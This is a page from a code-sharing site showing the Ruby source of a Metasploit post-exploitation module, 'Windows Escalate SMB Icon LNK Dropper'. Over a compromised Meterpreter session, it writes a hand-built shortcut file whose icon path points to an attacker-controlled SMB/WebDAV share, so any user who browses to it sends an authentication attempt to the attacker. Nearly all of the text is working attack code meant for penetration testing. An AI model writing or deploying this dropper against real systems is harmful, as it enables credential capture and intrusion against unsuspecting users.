Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/escalate/droplnk.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'Windows Escalate SMB Icon LNK Dropper',

13
        'Description' => %q{

14
          This module drops a shortcut (LNK file) that has a ICON reference

15
          existing on the specified remote host, causing SMB and WebDAV

16
          connections to be initiated from any user that views the shortcut.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [ 'mubix' ],

20
        'Platform' => [ 'win' ],

21
        'SessionTypes' => [ 'meterpreter' ],

22
        'Compat' => {

23
          'Meterpreter' => {

24
            'Commands' => %w[

25
              core_channel_eof

26
              core_channel_open

27
              core_channel_read

28
              core_channel_write

29
              stdapi_fs_getwd

30
            ]

31
          }

32
        },

33
        'Notes' => {

34
          'Stability' => [CRASH_SAFE],

35
          'SideEffects' => [ARTIFACTS_ON_DISK],

36
          'Reliability' => []

37
        }

38
      )

39
    )

40
    register_options(

41
      [

42
        OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),

43
        OptString.new('LNKFILENAME', [ true, "Shortcut's filename", 'Words.lnk']),

44
        OptString.new('SHARENAME', [ true, 'Share name on LHOST', 'share1']),

45
        OptString.new('ICONFILENAME', [ true, "File name on LHOST's share", 'icon.png'])

46
      ]

47
    )

48
  end

49


50
  def run

51
    print_status 'Creating evil LNK'

52
    lnk = ''

53
    lnk << "\x4c\x00\x00\x00"                  # Header size

54
    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00"  # Link CLSID

55
    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"

56
    lnk << "\xdb\x00\x00\x00"                  # Link flags

57
    lnk << "\x20\x00\x00\x00"                  # File attributes

58
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Creation time

59
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Access time

60
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Write time

61
    lnk << "\x00\x00\x00\x00"                  # File size

62
    lnk << "\x00\x00\x00\x00"                  # Icon index

63
    lnk << "\x01\x00\x00\x00"                  # Show command

64
    lnk << "\x00\x00"                          # Hotkey

65
    lnk << "\x00\x00"                          # Reserved

66
    lnk << "\x00\x00\x00\x00"                  # Reserved

67
    lnk << "\x00\x00\x00\x00"                  # Reserved

68
    lnk << "\x7b\x00"                          # IDListSize

69
    # sIDList

70
    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"

71
    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"

72
    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"

73
    lnk << 'C:\\'

74
    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

75
    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"

76
    lnk << "\x00"

77
    lnk << 'AUTOEXEC.BAT'

78
    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"

79
    lnk << "\x5b\x15\x14\x00\x00\x00"

80
    lnk << Rex::Text.to_unicode('AUTOEXEC.BAT')

81
    lnk << "\x00\x00\x1c\x00\x00\x00"

82
    # sLinkInfo

83
    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"

84
    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"

85
    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"

86
    lnk << "\x00\x00\x00"

87
    lnk << 'C:\\AUTOEXEC.BAT'

88
    lnk << "\x00\x00\x0e\x00"

89
    # RELATIVE_PATH

90
    lnk << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')

91
    lnk << "\x03\x00"

92
    # WORKING_DIR

93
    lnk << Rex::Text.to_unicode('C:\\')

94
    # ICON LOCATION

95
    lnk << "\x1c\x00"

96
    lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\#{datastore['SHARENAME']}\\#{datastore['ICONFILENAME']}`")

97
    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"

98
    lnk << 'computer'

99
    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"

100
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"

101
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"

102
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"

103
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"

104


105
    print_status "Done. Writing to disk - #{session.fs.dir.pwd}\\#{datastore['LNKFILENAME']}"

106
    file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')

107
    file.write(lnk)

108
    file.close

109
    print_status 'Done. Wait for evil to happen..'

110
  end

111
end

112


113